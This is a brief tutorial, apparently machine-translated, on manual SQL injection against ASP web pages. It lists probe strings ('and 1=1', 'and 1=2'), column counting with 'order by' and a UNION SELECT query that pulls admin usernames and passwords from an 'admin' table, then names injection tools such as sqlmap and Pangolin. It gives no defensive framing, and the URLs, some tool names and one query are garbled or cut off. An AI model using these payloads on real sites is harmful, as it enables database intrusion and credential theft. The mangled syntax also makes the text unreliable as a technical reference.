SQL Injection [manual and some tools] and SQL Injection Manual
Analysis of SQL Injection principles:
Website programs can transmit controllable parameters without filtering and directly bring them to the database for query. As a result, attackers can execute attacks by passing malicious SQL statement code.
SQL Injection Conditions
1. parameters must be passed
2. Bring the parameter values to the database for query and execution
Determine whether injection is used:
Example: http://www.xxx.xxx asp? Id = xx asp? Id = xx
Normal page with 'or and 1 = 1
And 1 = 2 error page
3. Guess the number of column names
Use order by to guess the number of column names.
Order by 22 22 indicates that 22 column names are queried.
Http://www.xxx.xxx asp? Id = xx order by 22 normal
Http://www.xxx.xxx asp? Id = xx order by 23 Error
4. Check whether the admin table name exists.
Http://www.xxx.xxx asp? Id = xx UNION SELECT
, From admin
5. Guess the column name to guess the data
Http://www.xxx.xxx asp? Id = xx UNION SELECT
1, 2, admin, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, password, 16, 17, 18, 19, 20, 21, 22 from admin
Injection tool:
Ah D, mingxiao, pangolin, radish header, sqlmap
Tool functionality:
Supports database types, injection types, injection breakthrough types, and tool speed